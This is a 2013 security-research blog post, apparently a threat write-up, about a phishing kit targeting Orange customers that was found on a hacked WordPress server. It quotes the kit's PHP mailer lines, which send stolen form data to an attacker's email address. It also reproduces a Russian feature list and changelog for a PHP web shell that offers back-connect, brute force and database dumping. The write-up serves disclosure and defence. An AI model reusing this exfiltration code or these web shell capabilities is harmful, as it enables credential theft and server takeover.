Saturday, 9 February 2013

Phish-BankFraud (Orange)

Found on a compromised server who run Wordpress.
It's the same actor as http://www.xylibox.com/2013/02/phish-bankfraud-edf-caf-and-now.html
But instead of EDF, Orange is targeted.

Phishing pages:
http://www.phishtank.com/phish_detail.php?phish_id=1724946
http://www.phishtank.com/phish_detail.php?phish_id=1724994

ghazalox.php:
$send = "ayoub.boos7@gmail.com";

$subject = "BoOooOooOs Rezuult";
$headers = "Frm: ayoub.boos7@gmail.com>";
$headers .= $_POST['eMAdd']."\n";
$headers .= "MIME-Version: 1.0\n";

mail($send,$subject,$message,$headers);

Same Spam tool and same backdoors used:

Backdoor.PHP.WebShell.BD:

Something new, Turbo Force:

And various custom r57 shells:


Dumped phishings can be found here: http://www.kernelmode.info/forum/viewtopic.php?f=16&t=2431#p18119
And backdoors here: http://www.kernelmode.info/forum/viewtopic.php?f=16&t=2410&start=20#p18118



Bank customers reply to phishing e-mails:

---
---
---
---
---

And more and more e-mails...

Also i've found yesterday a changelog of Backdoor.PHP.WebShell.BD:
Данная утилита предоставляет веб-интерфейс для удаленной работы c операционной системой и ее службами/демонами.
Описание возможностей / особенности:

* Авторизация на cookies
* Информация о сервере
* Файловый менеджер (Копирование, переименование, перемещение, удаление, чмод, тач, создание файлов и папок)
* Просмотр, hexview, редактирование, скачивание, загрузка файлов
* Работа с zip архивами (упаковка, распаковка) + сжатие в tar.gz
* Консоль
* SQL менеджер (MySql, PostgreSql)
* Выполнение PHP кода
* Работа со строками + поиск хеша в онлайн базах
* Биндпорт и бек-коннект (Perl)
* Bruteforce FTP, MySQL, PgSQL
* Поиск файлов, поиск текста в файлах
* Поддержка *nix-like и Windows систем
* Антипоисковик (проверяется User-Agent, если поисковик, тогда возвращается 404 ошибка)
* Можно использовать AJAX
* Небольшой размер. Упакованная версия занимает 22.8 Kb
* Выбор кодировки, в которой работает шелл.

Чейнджлог:
2.5

* Вместо сессий теперь используется cookies
* Исправлен поиск по exploit-db.com
* Убран раздел Safe-mode
* Шелл корректно работает при disabled_functions = scandir
* Теперь можно искать не только текст в файлах, но и просто файлы по маске
* Переработан mysql dump
* Изменен список сервисов в "Search for hash"
* Убраны изображения из phpinfo()
* "Мелкая косметика"
* Исправление других мелких багов


2.4

* добавлена переменная в конфиг, отвечающая за включение/выключения ипользования AJAX по умолчанию
* улучшен раздел Sql
* новый формат дампа (более компактный)
* возможность сохранять дамп в файл (если имя файла не указано, то дамп предлагается сразу скачать)
* gui получше, навигация по таблице теперь удобней
* добавлена возможность включить/отключить подсчет количества записей в таблицах
* Load file выводиться, если у пользователя хватает привилегий
* при неудачном коннекте к бд выводиться ошибку
* добавлена возможность смотреть ошибки в Console (перенаправление stderr в stdout)
* в Sec. Info добавлен вывод модулей Apache'а
* теперь в файловом менеджере при наведении на ссылки (я про ссылки в фс) всплывает подсказка куда ведет ссылка
* можно упаковывать в tar.gz, если доступно выполнение команд.
* можно указывать названия для архивов
* ссылка на поиск сплойта под ядро теперь ведет на exploit-db.com
* попытался выделить место куда в Console вбивать команды более заметно)
* фиксы багов

No comments:

Post a comment